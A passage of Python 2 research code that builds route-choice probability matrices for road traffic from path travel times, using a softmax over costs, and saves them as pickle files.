joblib.dump(r, os.path.join('R_matrix', date_str+".pickle"))
def softmax(x, theta=-0.01):
# print x
"""Compute softmax values for each sets of scores in x."""
y = np.copy(x) * theta
print y
p = np.minimum(np.maximum(np.exp(y), 1e-20), 1e20) / np.sum(np.minimum(np.maximum(np.exp(y), 1e-20), 1e20), axis=0)
# print p
if np.isnan(p).any():
p = np.ones(len(x)) / len(x)
return p
def get_full_arrival_time(start_time, link_list, spd_data, tmp_date, link_dict, spd=None):
# if len(link_list) == 0:
# return start_time
# link_to_pass = link_list[0]
# if link_to_pass.length == np.float(0):
# link_list.pop(0)
# return get_full_arrival_time(start_time, link_list, spd_data, tmp_date, link_dict)
# if link_to_pass.ID not in spd_data.keys():
# link_list.pop(0)
# new_start_time = (datetime.datetime.combine(tmp_date, start_time) + datetime.timedelta(seconds = np.round(link_to_pass.fft))).time()
# return get_full_arrival_time(new_start_time, link_list, spd_data, tmp_date, link_dict)
# if type(spd) == type(None):
# spd = spd_data[link_to_pass.ID].loc[tmp_date]
# length_togo = link_to_pass.length
# new_start_time = get_finish_time(spd, length_togo, start_time, tmp_date)
# link_list.pop(0)
arrival_time = copy.copy(start_time)
for link in link_list:
arrival_time = get_arrival_time(arrival_time, link, spd_data, tmp_date, link_dict)
return arrival_time
# tmp_date = datetime.date(2014, 1, 1)
def get_P(N, spd_data, analysis_start_time, time_interval, tmp_date, path_list, OD_paths):
num_path_v = [len(x) for x in OD_paths.itervalues()]
num_path = np.sum(num_path_v)
OD_list = list(OD_paths.keys())
num_OD = len(OD_list)
row_list = list()
col_list = list()
data_list = list()
for h in xrange(N):
# print h, N
start_time = (datetime.datetime.combine(tmp_date, analysis_start_time) + h * time_interval).time()
for (O,D), paths in OD_paths.iteritems():
# print (O,D)
cost_list = list()
for path in paths:
arrival_time = get_full_arrival_time(start_time, path.link_list, spd_data, tmp_date, None)
cost = (datetime.datetime.combine(tmp_date, arrival_time) - datetime.datetime.combine(tmp_date, start_time)).total_seconds()
path.cost = cost
cost_list.append(cost)
p_list = softmax(cost_list)
print cost_list, p_list
for idx, path in enumerate(paths):
path.p = p_list[idx]
# print p_list
for rs, (O,D) in enumerate(OD_list):
for k, path in enumerate(path_list):
if k < np.sum(num_path_v[0:rs+1]) and k >= np.sum(num_path_v[0:rs]):
x_loc = h * num_OD + rs
y_loc = h * num_path + k
data = path.p
row_list.append(y_loc)
col_list.append(x_loc)
data_list.append(data)
P = csr_matrix((data_list, (row_list, col_list)), shape=(num_path * N, num_OD * N))
return P
def save_p(N, spd_data, analysis_start_time, time_interval, single_date, path_list, OD_paths):
import joblib
date_str = single_date.strftime("%Y-%m-%d")
print date_str
P = get_P(N, spd_data, analysis_start_time, time_interval, single_date, path_list, OD_paths)
joblib.dump(P, os.path.join('P_matrix', date_str+".pickle"))
def to_south((O,D)):
real_O = O % 1000
real_D = D % 1000
return real_O < real_D
| 2.171875
| 2
|